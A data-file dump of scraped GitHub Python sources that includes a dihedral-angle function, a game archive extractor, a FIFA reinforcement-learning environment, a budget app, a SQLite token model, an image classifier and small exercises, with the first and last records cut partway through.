utf-8 -*-\n\nimport numpy as np\n\n\ndef calc_dihedral(b1, b2, b3):\n '''Refer to the formula on wikipedia: https://en.wikipedia.org/wiki/Dihedral_angle#cite_note-3\n for details. \n It returns angles in a unit of degree. \n\n b array has to be a 2D-array in order to support vectorization.\n\n >>> b = np.array([ [0.3, 0.5, 0.3] ])\n\n b array explained:\n - root axis (axis 0): instances of b1 (or b2 or b3)\n - primary axisx (axis 1): XYZ coordinates\n '''\n b12 = np.cross(b1, b2, axis = 1)\n b23 = np.cross(b2, b3, axis = 1)\n b1213 = np.cross(b12, b23, axis = 1)\n b2_norm = b2 / np.linalg.norm(b2, axis = 1, keepdims = True)\n v1 = np.sum( b1213 * b2_norm, axis = 1 )\n v2 = np.sum( b12 * b23, axis =1 )\n\n return np.arctan2(v1, v2) / np.pi * 180.0\n","repo_name":"carbonscott/pyrotein","sub_path":"pyrotein/angle.py","file_name":"angle.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"15405629362","text":"\"\"\"\r\n @name : a1122\r\n @version : 21.0223\r\n @author : zhangpeng96\r\n @time : 22'00\"\r\n @accepted : all\r\n\"\"\"\r\n\r\ndef judge(n, arr, vertex):\r\n if arr[0] != arr[-1] or n != (vertex+1) or len(set(arr)) != vertex:\r\n return False\r\n for v1, v2 in zip(arr[:-1], arr[1:]):\r\n if not graph[v1][v2]: return False\r\n return True\r\n\r\n\r\nvertex_n, edge_n = map(int, input().split())\r\n\r\ngraph = [ [False]*(vertex_n+1) for _ in range(vertex_n+1) ] \r\n\r\nfor _ in range(edge_n):\r\n a, b = map(int, input().split())\r\n graph[a][b] = True\r\n graph[b][a] = True\r\n\r\nfor _ in range(int(input())):\r\n n, *arr = map(int, input().split())\r\n if judge(n, arr, vertex_n):\r\n print('YES')\r\n else:\r\n print('NO')\r\n","repo_name":"zhangpeng96/Programming-Ability-Practice","sub_path":"PAT-A/a1122-hamiltonian-cycle/python-a1122.py","file_name":"python-a1122.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"450907856","text":"# -*- coding: utf-8 -*-\n\n# Tested on Python 3.8.0\n# This tool should be used with Silent Hill: Orphan (Java)\n\n# Ver Date Author\n# v0.1 17.04.2020 Bartlomiej Duda\n# v0.2 17.04.2020 Bartlomiej Duda\n\n\n\n\nVERSION_NUM = \"v0.2\"\n\nimport os\nimport sys\nimport struct\n\n\n\ndef bd_logger(in_str):\n import datetime\n now = datetime.datetime.now()\n print(now.strftime(\"%d-%m-%Y %H:%M:%S\") + \" \" + in_str) \n \n\n\ndef export_bin(in_BIN_filepath, out_folder_path):\n '''\n Function for exporting data from BIN files\n ''' \n bd_logger(\"Starting export_bin...\") \n \n bin_file = open(in_BIN_filepath, 'rb')\n \n num_of_chunks = struct.unpack('b', bin_file.read(1))[0]\n print(\"num_of_chunks: \" + str(num_of_chunks) )\n \n \n #read chunks\n for i in range(num_of_chunks):\n chunk_name_length = struct.unpack('>b', bin_file.read(1))[0]\n chunk_name = bin_file.read(chunk_name_length).decode(\"utf8\")\n #print( str(i+1) + \") chunk_name: \" + chunk_name)\n data_size = struct.unpack('>h', bin_file.read(2))[0]\n \n if data_size == 0:\n continue\n else:\n data = bin_file.read(data_size)\n out_path = out_folder_path + \"\\\\\" + chunk_name.replace(\"/\", \"\\\\\") \n print(str(i+1) + \") out: \" + out_path)\n \n if not os.path.exists(os.path.dirname(out_path)):\n try:\n os.makedirs(os.path.dirname(out_path))\n except:\n pass\n \n #write data \n out_file = open(out_path, 'wb+')\n out_file.write(data)\n out_file.close()\n \n \n \n bin_file.close()\n bd_logger(\"Ending export_bin...\") \n \n \n \n \ndef main():\n \n main_switch = 3\n # 1 - bin export \n # 2 - all bins export\n # 3 - all bins export to the same folder\n \n \n bin_arr = [ \"0.bin\", \"1.bin\", \"2.bin\", \"3.bin\", \"4.bin\", \"5.bin\", \"6.bin\", \"7.bin\", \"8.bin\", \"9.bin\", \"a.bin\", \"b.bin\", \"c.bin\", \"d.bin\", \"e.bin\", \"f.bin\" ] \n bin_fold = \"C:\\\\Users\\\\Arek\\\\Desktop\\\\Silent_Hill_Orphan_SPOL\\\\JAR_out\\\\chunks\\\\\"\n \n \n if main_switch == 1:\n p_in_BIN_filepath = \"C:\\\\Users\\\\Arek\\\\Desktop\\\\Silent_Hill_Orphan_SPOL\\\\JAR_out\\\\chunks\\\\0.bin\"\n p_out_folder_path = \"C:\\\\Users\\\\Arek\\\\Desktop\\\\Silent_Hill_Orphan_SPOL\\\\JAR_out\\\\chunks\\\\0.bin_out\"\n export_bin(p_in_BIN_filepath, p_out_folder_path)\n \n elif main_switch == 2:\n for f_bin in bin_arr:\n bin_path = bin_fold + f_bin \n out_path = bin_fold + f_bin + \"_out\"\n export_bin(bin_path, out_path) \n \n elif main_switch == 3:\n for f_bin in bin_arr:\n bin_path = bin_fold + f_bin \n out_path = bin_fold + \"OUT\"\n export_bin(bin_path, out_path) \n\n \n else:\n print(\"Wrong option selected!\")\n \n \n \n bd_logger(\"End of main...\") \n \n \n \nmain()","repo_name":"bartlomiejduda/Tools","sub_path":"NEW Tools/Silent Hill Orphan/Silent_Hill_Orphan_BIN_Tool.py","file_name":"Silent_Hill_Orphan_BIN_Tool.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"78"} +{"seq_id":"32562519228","text":"def DetermineIfMinCreditsObtained(Income):\n\n # Unpack needed dicts\n IncomeYears = Income['IncomeYears']\n IncomeArray = Income['IncomeArray']\n\n # Amounts needed to earn one quarter of coverage (one credit) for each year from 1978 to 2023:\n # Table provided at https://www.ssa.gov/oact/cola/QC.html\n YearsArray = list(range(1978, 2024))\n CreditCost = [250, 260, 290, 310, 340, 370, 390, 410, 440, 460, 470, 500, 520, 540, 570, 590, 620, 630, 640, 670,\n 700, 740, 780, 830, 870, 890, 900, 920, 970, 1000, 1050, 1090, 1120, 1120, 1130, 1160, 1200, 1220,\n 1260, 1300, 1320, 1360, 1410, 1470, 1510, 1640]\n\n # Initialize\n TotalCredits = 0\n\n # Loop over income years\n for ct in range(len(IncomeYears)):\n\n # Determine credit cost for this year\n Year = IncomeYears[ct]\n # If year is within YearsArray, grab corresponding index:\n if Year <= YearsArray[-1]:\n ind = YearsArray.index(Year)\n else: # use the credit cost for the final year listed\n ind = len(YearsArray) - 1\n CreditCostThisYear = CreditCost[ind]\n\n NumCreditsThisYear = int(IncomeArray[ct] / CreditCostThisYear)\n if NumCreditsThisYear > 4: # maximum number of credits each year is 4\n NumCreditsThisYear = 4\n\n TotalCredits += NumCreditsThisYear\n\n if TotalCredits >= 40:\n MinCreditsObtained = True\n else: MinCreditsObtained = False\n\n return MinCreditsObtained, TotalCredits\n","repo_name":"EngineeringYourFI/master","sub_path":"SocialSecurityIncome/DetermineIfMinCreditsObtained.py","file_name":"DetermineIfMinCreditsObtained.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"72803554171","text":"import pytesseract as pt\nfrom Network_model import *\nfrom PIL import Image\nfrom Keyboard_mapping_and_screen_shot import *\nimport numpy as np\nimport time\nimport torch\nfrom torchvision.transforms import transforms\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset\nclass myDataloader(Dataset):\n def __init__(self, data):\n self.data = data\n def __len__(self):\n return len(self.data)\n def __getitem__(self, item):\n return self.data[item]\n\nclass FIFA(object):\n \"\"\"\n This class acts as the intermediate \"API\" to the actual game. Double quotes API because we are not touching the\n game's actual code. It interacts with the game simply using screen-grab (input) and keypress simulation (output)\n using some clever python libraries.\n \"\"\"\n\n def __init__(self, max_memory=100000, discount=.9):\n self.feature_map = FeatureMap()\n self.reward = 0\n self.max_memory = max_memory\n self.memory = list()\n self.discount = discount\n self.rewarder = Get_Reward()\n\n def _get_reward(self):\n\n reward_screen = grab_screen(region=(460, 0, 1080, 1080))\n feature_extract = self.feature_map.FeatureExtract(reward_screen)\n ingame_reward = self.rewarder.send_reward(feature_extract)\n return ingame_reward\n\n def observe(self):\n print('\\n\\nobserve')\n restart_button = grab_screen((552, 815, 200, 100))\n buttom_image = Image.fromarray(restart_button.astype('uint8'), 'RGB')\n restart_text = pt.image_to_string(buttom_image)\n if \"RETRY DRILL\" in restart_text:\n # press enter key\n print('pressing enter, reset reward')\n self.reward = 0\n PressKey(leftarrow)\n time.sleep(0.4)\n ReleaseKey(leftarrow)\n PressKey(enter)\n time.sleep(0.4)\n ReleaseKey(enter)\n time.sleep(2)\n # get current state s from screen using screen-grab\n screen = grab_screen(region=(460, 0, 1080, 1080))\n # process through FeatureMap to get the feature map from the raw image\n state = self.feature_map.FeatureExtract(screen)\n return state\n\n def act(self, action):\n display_action = [\"leftarrow\", \"leftarrow\", \"leftarrow\", \"rightarrow\", \"rightarrow\", \"rightarrow\",\n \"uparrow\", \"uparrow\", \"uparrow\", \"downarrow\", \"downarrow\", \"downarrow\", \"spacebar\", \"Q\", \"W\",\n \"E\", \"F\"]\n print('action: ' + str(display_action[action]))\n keys_to_press = [[leftarrow], [leftarrow], [leftarrow], [rightarrow], [rightarrow], [rightarrow],\n [uparrow], [uparrow], [uparrow], [downarrow], [downarrow], [downarrow], [spacebar], [Q], [W],\n [E], [F]]\n short_action = [0, 3, 6, 9]\n medium_action = [1, 4, 7, 10]\n long_action = [2, 5, 8, 11]\n move = np.arange(0, 12, 1)\n # need to keep all keys pressed for some time before releasing them otherwise fifa considers them as accidental\n # key presses.\n for key in keys_to_press[action]:\n if action in move:\n PressKey(key)\n if action in short_action:\n time.sleep(1)\n if action in medium_action:\n time.sleep(5)\n if action in long_action:\n time.sleep(10)\n PressKey(Q)\n time.sleep(0.2)\n ReleaseKey(Q)\n if action in [12, 13, 14,15]: # transient a ball to other player or shot the ball, then we choose to move a distance and transmit the ball again\n PressKey(key)\n sub_action = np.random.choice(move)\n if sub_action in move:\n PressKey(keys_to_press[sub_action][0])\n if sub_action in short_action:\n time.sleep(1)\n if sub_action in medium_action:\n time.sleep(5)\n if sub_action in long_action:\n time.sleep(10)\n PressKey(Q)\n time.sleep(0.2)\n ReleaseKey(Q)\n ReleaseKey(keys_to_press[sub_action][0])\n for key in keys_to_press[action]:\n ReleaseKey(key)\n # wait until some time after taking action\n\n reward = self._get_reward()\n return self.observe(), reward\n\n def reset(self):\n return 0\n\n def remember(self, states):\n # Save a state to memory\n self.memory.append(states)\n # We don't want to store infinite memories, so if we have too many, we just delete the oldest one\n if len(self.memory) > self.max_memory:\n del self.memory[0]\n\n def get_batch(self, model, target_net, batch_size=10, game_over=False):\n\n # How many experiences do we have?\n len_memory = len(self.memory)\n\n num_actions = 17\n\n # Dimensions of the game field\n env_dim = self.memory[0][0].shape[1]\n\n # We want to return an input and target vector with inputs from an observed state...\n inputs = np.zeros((min(len_memory, batch_size), env_dim))\n\n # ...and the target r + gamma * max Q(s’,a’)\n # Note that our target is a matrix, with possible fields not only for the action taken but also\n # for the other possible actions. The actions not take the same value as the prediction to not affect them\n targets = np.zeros((inputs.shape[0], num_actions))\n model.eval()\n target_net.eval()\n # We draw states to learn from randomly\n for i, idx in enumerate(np.random.randint(0, len_memory,\n size=inputs.shape[0])):\n \"\"\"\n Here we load one transition <s, a, r, s’> from memory\n state_t: initial state s\n action_t: action taken a\n reward_t: reward earned r\n state_tp1: the state that followed s’\n \"\"\"\n state_t, action_t, reward_t, state_tp1 = self.memory[idx]\n\n\n # add the state s to the input\n inputs[i:i + 1] = state_t\n\n # First we fill the target values with the predictions of the model.\n # They will not be affected by training (since the training loss for them is 0)\n # state_t = self.transform_numpy(state_t)\n # state_t = Variable(torch.from_numpy(state_t))\n state_t = torch.Tensor(state_t).float()\n with torch.no_grad():\n targets[i] = model(state_t)\n\n\n \"\"\"\n If the game ended, the expected reward Q(s,a) should be the final reward r.\n Otherwise the target value is r + gamma * max Q(s’,a’)\n \"\"\"\n # Here Q_sa is max_a'Q(s', a')\n state_tp1 = torch.Tensor(state_tp1).float()\n with torch.no_grad():\n action_tp1 = np.argmax(model(state_tp1).numpy())\n Q_sa = target_net(state_tp1).numpy()[0][action_tp1]\n # if the game ended, the reward is the final reward\n if game_over: # if game_over is True\n targets[i, action_t] = reward_t\n else:\n # r + gamma * max Q(s’,a’)\n targets[i, action_t] = reward_t + self.discount * Q_sa\n return inputs, targets\n\n","repo_name":"CoderNoMercy/FIFA_PLAY_WHOLE_GAME","sub_path":"ENV_Create.py","file_name":"ENV_Create.py","file_ext":"py","file_size_in_byte":7435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37646904434","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\n@File : bubble_sort_simultaneous.py\n@Time : 2023/02/27 13:53:39\n@Author : komorebi \n'''\n\n\"\"\"\nA bubble sort can be modified to “bubble” in both directions. \nThe first pass moves “up” the list, and the second pass moves “down.” \nThis alternating pattern continues until no more passes are necessary. \nImplement this variation .\n\"\"\"\nimport random\ndef bubble_sort(li:list) -> None:\n \"\"\"\n sort from two directions\n from left to right to find the largest number during first loop duration\n then the second largest \n from right to left to find the smallest number during first loop duration\n then the second smallest\n until the list is sorted, stop looping \n \"\"\"\n for i in range(len(li) - 1):\n need_swap = False\n for j in range(len(li) - 1 - i): # start from left\n if li[j] > li[j+1]: # if current value > next right value, swap them\n need_swap = True\n li[j], li[j+1] = li[j+1], li[j]\n print('up',li)\n need_swap = False\n for x in range(len(li) - 2 - i, 0 , -1): # start from right\n if li[x] < li[x-1]: # if current value < next left value, swap them\n need_swap = True\n li[x-1], li[x] = li[x], li[x-1]\n print('down',li)\n if need_swap == False: # list is sorted\n break\n\nif __name__ == '__main__':\n li = [0,1,2,3,4,5,6,7,8,9]\n random.shuffle(li)\n print(li)\n bubble_sort(li)\n print(li)","repo_name":"lost-komorebi/Data-Structures-and-Algorithms-Python-Coding","sub_path":"sort/exercise/bubble_sort_in_both_directions.py","file_name":"bubble_sort_in_both_directions.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38785882653","text":"from dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import TYPE_CHECKING\n\nfrom ..errors import RowDontExistException\n\nif TYPE_CHECKING:\n from sqlite3 import Connection\n\n\n@dataclass\nclass Token:\n id: int\n refresh_token: str\n token: str\n expires_in: int\n created: datetime\n\n\nclass TokenModel:\n def __init__(self, db: 'Connection'):\n self._db = db\n self._cursor = db.cursor()\n\n def insert(self, refresh_token: str, token: str, expires_in=1800) -> int:\n insert_query = '''\n INSERT INTO token (refresh_token, token, expires_in)\n VALUES (?, ?, ?);\n '''\n self._cursor.execute(insert_query, [refresh_token, token, expires_in])\n self._db.commit()\n return self._cursor.lastrowid\n\n def get_by_id(self, token_id: int) -> Token:\n select_query = '''\n SELECT id, refresh_token, token, expires_in, created\n FROM token\n WHERE id = ?\n LIMIT 1;\n '''\n self._cursor.execute(select_query, [token_id])\n token_row = self._cursor.fetchone()\n if not token_row:\n raise RowDontExistException(f\"Token with id {token_id} do not exist\")\n return Token(*token_row)\n\n def get_by_token_or_refresh_token(self, token: str = None, refresh_token: str = None):\n select_query = '''\n SELECT id, refresh_token, token, expires_in, created\n FROM token\n WHERE token=? OR refresh_token=?\n LIMIT 1;\n '''\n self._cursor.execute(select_query, [token, refresh_token])\n token_row = self._cursor.fetchone()\n if not token_row:\n raise RowDontExistException(f\"Token with id {token} do not exist\")\n return Token(*token_row)\n\n def get_latest_token(self) -> Token:\n select_query = '''\n SELECT id, refresh_token, token, expires_in, created\n FROM token\n ORDER BY created DESC\n LIMIT 1;\n '''\n self._cursor.execute(select_query)\n token_row = self._cursor.fetchone()\n if not token_row:\n raise RowDontExistException(\"table token is empty\")\n return Token(*token_row)\n","repo_name":"tartancz/YoutubeCodeFarmer","sub_path":"database/models/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42180135407","text":"import os\n\nos.environ['OMP_NUM_THREADS'] = '1'\nimport paddle\nfrom model import Model\nfrom env import create_train_env\nimport paddle.nn.functional as F\nfrom gym_super_mario_bros.actions import SIMPLE_MOVEMENT, COMPLEX_MOVEMENT, RIGHT_ONLY\nfrom visualdl import LogWriter\nimport hashlib\n\n\n# 评估模型\ndef eval(args, num_states, num_actions):\n log_writer = LogWriter(logdir='log')\n # 固定初始化状态\n paddle.seed(123)\n # 使用 GPU预测\n if paddle.is_compiled_with_cuda():\n paddle.set_device(\"gpu:0\")\n # 判断游戏动作类型\n if args.action_type == \"right\":\n actions = RIGHT_ONLY\n elif args.action_type == \"simple\":\n actions = SIMPLE_MOVEMENT\n else:\n actions = COMPLEX_MOVEMENT\n # 创建游戏动作\n env = create_train_env(args.world, args.stage, actions)\n # 获取网络模型\n local_model = Model(num_states, num_actions)\n # 切换为评估状态\n local_model.eval()\n # 将图像转换为Paddle的数据类型\n state = paddle.to_tensor(env.reset(), dtype=\"float32\")\n # 一开始就更新模型参数\n done = True\n # 日志的记录步数\n step = 0\n # 旧模型的MD5\n old_model_file_md5 = ''\n # 游戏总得分\n total_reward = 0\n while True:\n # 每结束一次就更新模型参数\n if done:\n try:\n model_path = \"{}/model_{}_{}.pdparams\".format(args.saved_path, args.world, args.stage)\n # 使用文件的MD5保证每个模型只用一次\n with open(model_path, 'rb') as f:\n file = f.read()\n file_md5 = hashlib.md5(file).hexdigest()\n if file_md5 == old_model_file_md5:\n continue\n else:\n model_dict = paddle.load(model_path)\n old_model_file_md5 = file_md5\n except:\n continue\n total_reward = 0\n local_model.load_dict(model_dict)\n # 预测动作概率和评估值\n logits, value = local_model(state)\n # 获取动作的序号\n policy = F.softmax(logits, axis=1)\n action = paddle.argmax(policy)[0]\n # 执行游戏\n state, reward, done, info = env.step(int(action))\n total_reward += reward\n # 显示界面\n if args.show_play:\n env.render()\n # 游戏通关\n if info[\"flag_get\"]:\n print(\"World {} stage {} 通关\".format(args.world, args.stage))\n paddle.save(local_model.state_dict(),\n \"{}/model_{}_{}_finish.pdparams\".format(args.saved_path, args.world, args.stage))\n # 重置游戏状态\n if done:\n step += 1\n state = env.reset()\n print('总得分是:%f' % total_reward)\n log_writer.add_scalar(tag='Eval reward', value=total_reward, step=step)\n # 转换每一步都游戏状态\n state = paddle.to_tensor(state, dtype=\"float32\")\n\n\ndef print_arguments(args):\n print(\"----------- Configuration Arguments -----------\")\n for arg, value in sorted(vars(args).items()):\n print(\"%s: %s\" % (arg, value))\n print(\"------------------------------------------------\")\n","repo_name":"yeyupiaoling/ReinforcementLearning","sub_path":"PPO-SuperMarioBros/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"78"} +{"seq_id":"10152382219","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sb\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch import optim\r\nimport torch.nn.functional as F\r\nfrom torchvision import datasets, transforms, models\r\nfrom PIL import Image\r\nimport json\r\nimport argparse\r\nimport sys\r\n\r\nfrom collections import OrderedDict\r\n\r\n# A function that loads a checkpoint and rebuilds the model\r\ndef load_checkpoint(filepath):\r\n checkpoint = torch.load(filepath)\r\n model = models.vgg19(pretrained = True)\r\n model.class_to_idx = checkpoint['class_to_idx']\r\n classifier = nn.Sequential(OrderedDict([('fc1', nn.Linear(25088, 4096)),\r\n ('relu', nn.ReLU()),\r\n ('drop', nn.Dropout(p = 0.5)),\r\n ('fc2', nn.Linear(4096, 102)),\r\n ('output', nn.LogSoftmax(dim = 1))]))\r\n model.classifier = classifier\r\n model.load_state_dict(checkpoint['model_state_dict'])\r\n return model\r\n\r\n# A function that pre-processes the image so it can be used as input for the model.\r\ndef process_image(image_path):\r\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n returns an Numpy array\r\n '''\r\n # Process a PIL image for use in a PyTorch model\r\n pil_image = Image.open(image_path)\r\n \r\n # Resize with Aspect Ratio maintained\r\n # First fixing the short axes\r\n if pil_image.width > pil_image.height:\r\n (width, height) = (int(pil_image.width / pil_image.height) * 256, 256)\r\n else:\r\n (width, height) = (256, int(pil_image.height / pil_image.width) * 256)\r\n pil_image = pil_image.resize((width, height))\r\n \r\n # Crop\r\n left = (pil_image.width - 224) / 2\r\n bottom = (pil_image.height - 224) / 2\r\n right = left + 224\r\n top = bottom + 224\r\n \r\n pil_image = pil_image.crop((left, bottom, right, top))\r\n \r\n # Convert to np then Normalize\r\n np_image = np.array(pil_image) / 255\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n np_image = (np_image - mean) / std\r\n \r\n # Transpose to fit PyTorch Axes\r\n np_image = np_image.transpose([2, 0, 1])\r\n \r\n return np_image\r\n\r\n\r\n# A function converts a PyTorch tensor and displays it\r\ndef imshow(image, ax=None, title=None):\r\n \"\"\"Imshow for Tensor.\"\"\"\r\n if ax is None:\r\n fig, ax = plt.subplots()\r\n if title is not None:\r\n ax.set_title(title)\r\n \r\n # PyTorch tensors assume the color channel is the first dimension\r\n # but matplotlib assumes is the third dimension\r\n image = image.transpose((1, 2, 0))\r\n \r\n # Undo preprocessing\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n image = std * image + mean\r\n \r\n # Image needs to be clipped between 0 and 1 or it looks like noise when displayed\r\n image = np.clip(image, 0, 1)\r\n \r\n ax.imshow(image)\r\n \r\n return ax\r\n\r\n# A function for making predictions with model\r\ndef predict(image_path, model, topk=5):\r\n ''' Predict the class (or classes) of an image using a trained deep learning model.\r\n '''\r\n # Implement the code to predict the class from an image file\r\n img = process_image(image_path)\r\n \r\n # Convert np_img to PT tensor and send to GPU\r\n pt_img = torch.from_numpy(img).type(torch.cuda.FloatTensor)\r\n \r\n # Unsqueeze to get shape of tensor from [Ch, H, W] to [Batch, Ch, H, W]\r\n pt_img = pt_img.unsqueeze(0)\r\n\r\n # Run the model to predict\r\n output = model.forward(pt_img)\r\n \r\n probs = torch.exp(output)\r\n \r\n # Pick out the topk from all classes \r\n top_probs, top_indices = probs.topk(topk)\r\n \r\n # Convert to list on CPU without grads\r\n top_probs = top_probs.detach().type(torch.FloatTensor).numpy().tolist()[0]\r\n top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0]\r\n \r\n # Invert the class_to_idx dict to a idx_to_class dict\r\n idx_to_class = {value: key for key, value in model.class_to_idx.items()}\r\n \r\n top_classname = {idx_to_class[index] for index in top_indices}\r\n \r\n return top_probs, top_classname\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Input\r\n\r\n # Class labelling\r\n with open('cat_to_name.json', 'r') as f:\r\n cat_to_name = json.load(f)\r\n \r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n print(f'Now the device is set to {device}')\r\n\r\n # Load checkpoint\r\n print('*** Loading checkpoint ***')\r\n model = load_checkpoint(saved_pth=sys.argv[2])\r\n\r\n # -----------------------------^^^^^^ INFERENCE STAGE ^^^^^^^----------------------------------- #\r\n print('*** Inference Stage ***')\r\n\r\n # Plot flower input image\r\n print('*** Input image ***')\r\n plt.figure(figsize = (6,10))\r\n plot_1 = plt.subplot(2,1,1)\r\n\r\n image = process_image(sys.argv[1])\r\n\r\n #flower_name = cat_to_name['21']\r\n\r\n imshow(image, plot_1)\r\n\r\n # Prediction with model\r\n model.to(device)\r\n probs, classes = predict(image_path=sys.argv[1], model=model, topk=5) \r\n print(probs)\r\n print(classes)\r\n\r\n print('*** Prediction result ***')\r\n # Convert from the class integer encoding to actual flower names\r\n flower_names = [cat_to_name[i] for i in classes]\r\n\r\n # Plot the probabilities for the top 5 classes as a bar graph\r\n plt.subplot(2,1,2)\r\n\r\n sb.barplot(x=probs, y=flower_names, color=sb.color_palette()[0])\r\n\r\n plt.show()","repo_name":"voduyquoc/Image-Classifier-using-CNN","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18593034629","text":"from django.contrib import admin\nfrom django.utils.html import format_html\nfrom places.models import Place, Image\nfrom adminsortable2.admin import SortableInlineAdminMixin\n\n\nclass ImageInline(SortableInlineAdminMixin, admin.TabularInline):\n model = Image\n readonly_fields = ('preview',)\n extra = 0\n\n def preview(self, image):\n url = image.file.url\n return format_html('<img src=\"{}\" height={} />', url, 200)\n\n fields = ('position', 'file', 'preview')\n\n\n@admin.register(Place)\nclass PlaceAdmin(admin.ModelAdmin):\n inlines = [\n ImageInline,\n ]\n","repo_name":"Kosmostars7403/Yandex-Afisha","sub_path":"places/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31615631289","text":"class Category:\n\n def __init__(self, name):\n self.name = name\n self.ledger = []\n self.budget = 0\n self.withdraws = 0\n\n def deposit(self, amount, description = \"\"):\n self.amount = amount\n self.ledger.append({\"amount\": self.amount, \"description\": description})\n self.budget += amount\n\n def withdraw(self, amount, description = \"\"):\n if self.check_funds(amount) == True:\n self.ledger.append({\"amount\": -1 * amount , \"description\": description})\n self.budget -= amount\n self.withdraws += amount\n return True\n else:\n return False\n\n def get_balance(self):\n return self.budget\n\n def check_funds(self, amount):\n if self.budget >= amount:\n # print(\"TRUE\")\n return True\n else:\n # print(\"FALSE\")\n return False\n\n\n def transfer(self, amount, category):\n category.deposit(amount, \"Transfer from \" + str(self.name))\n return self.withdraw(amount, \"Transfer to \" + str(category.name))\n \n \n def __str__(self):\n\n title = self.name.center(30, \"*\") + \"\\n\"\n transactions = \"\"\n for transaction in self.ledger:\n \n if len(transaction['description']) < 23:\n spaces = (30 - len(str(transaction['description']) + format(transaction['amount'], '.2f'))) * \" \"\n transactions += str(transaction['description']) + spaces + format(transaction['amount'], '.2f') + \"\\n\"\n else:\n transactions += str(transaction['description'])[0:23] + (7 - len(format(transaction['amount'], '.2f'))) * \" \" + format(transaction['amount'], '.2f') + \"\\n\"\n \n total = \"Total: \" + str(self.budget) \n balance = title + transactions + total \n\n return balance\n\n \ndef create_spend_chart(categories):\n \n # Calculing the percentages from each category\n \n total_expenses = 0\n strings = []\n \n for category in categories:\n total_expenses += category.withdraws\n strings.append(category.name) # Create a list with the names of each category\n\n\n pct_category = []\n\n for category in categories:\n pct_category.append(round(category.withdraws/total_expenses * 100, 0))\n \n # print(pct_category)\n rounded = []\n for pct in pct_category:\n if pct < 10:\n rounded.append(0)\n elif (pct % 10) / 10 > 0.5:\n rounded.append((pct // 10 + 1) * 10 )\n else:\n rounded.append((pct // 10) * 10 )\n\n \n # print(rounded)\n\n \n # Starts the string\n title = \"Percentage spent by category\\n\"\n\n percentages = [\"100| \", \" 90| \", \" 80| \", \" 70| \", \" 60| \", \n \" 50| \", \" 40| \", \" 30| \", \" 20| \", \" 10| \", \n \" 0| \"]\n\n\n expenses = \"\"\n counter = 110\n\n ## Graphs the points ans spaces\n \n for percentage in percentages:\n \n counter = counter - 10\n expenses += percentage \n\n for value in rounded:\n if counter > value:\n expenses += \" \"\n else:\n expenses += \"o \"\n \n expenses += \"\\n\"\n\n # Graphs the lines for the report\n line = (\" \"* 4) + \"-\" + (\"---\"* len(rounded)) + \"\\n\"\n\n # Graph the word below each percentage\n ## Finds the longest word in the string list\n longest = 0\n for text in strings:\n if len(text) > longest:\n longest = len(text)\n \n ## Normalize each word to get the same len to all the categogies\n for i in range(len(strings)):\n strings[i] = strings[i] + \" \" * (longest - len(strings[i]))\n\n \n ## Prints each letter.\n bottom = \"\"\n \n for i in range(len(strings[0])):\n bottom += \" \"\n for text in strings:\n bottom += \" \" + text[i] + \" \"\n \n bottom += \" \\n\"\n \n bottom = bottom.rstrip() + \" \"\n \n return title + expenses + line + bottom\n\n \n","repo_name":"YosefGuevara012/Budget_APP_FCC","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38711358894","text":"\"\"\"\nTry out Tkinter and ttk!\n\"\"\"\n\nimport tkinter\nfrom tkinter import ttk\nimport random\n\n\ndef main():\n # Make a window.\n # Put a Frame on it.\n # Put a Button on the frame.\n # Make your Button do something simple.\n # Add a Label and an Entry.\n # Make your Button do something with the Label and Entry.\n pass\n\n root = tkinter.Tk()\n\n main_frame = ttk.Frame(root, padding=(50), relief='raised')\n main_frame.grid()\n\n label = ttk.Label(main_frame, text='hello')\n label.grid()\n\n button = ttk.Button(main_frame, text='hello')\n button.grid()\n button['command'] = lambda: change_label(root, label, button)\n\n entry = ttk.Entry(main_frame, width=8)\n entry.grid()\n\n button2 = ttk.Button(main_frame, text='print number **10')\n button2.grid()\n button2['command'] = lambda: number_10th(entry, main_frame)\n\n root.mainloop()\n\ndef change_label(root, label, change_label_button):\n new_label = ''\n for k in range(8):\n new_label = new_label + chr(ord('A') + random.randrange(26))\n label['text'] = new_label\n\ndef number_10th(entry, frame):\n number = int(entry.get())\n new_number = number ** 10\n new_label = ttk.Label(frame, text='')\n new_label['text'] = str(new_number)\n 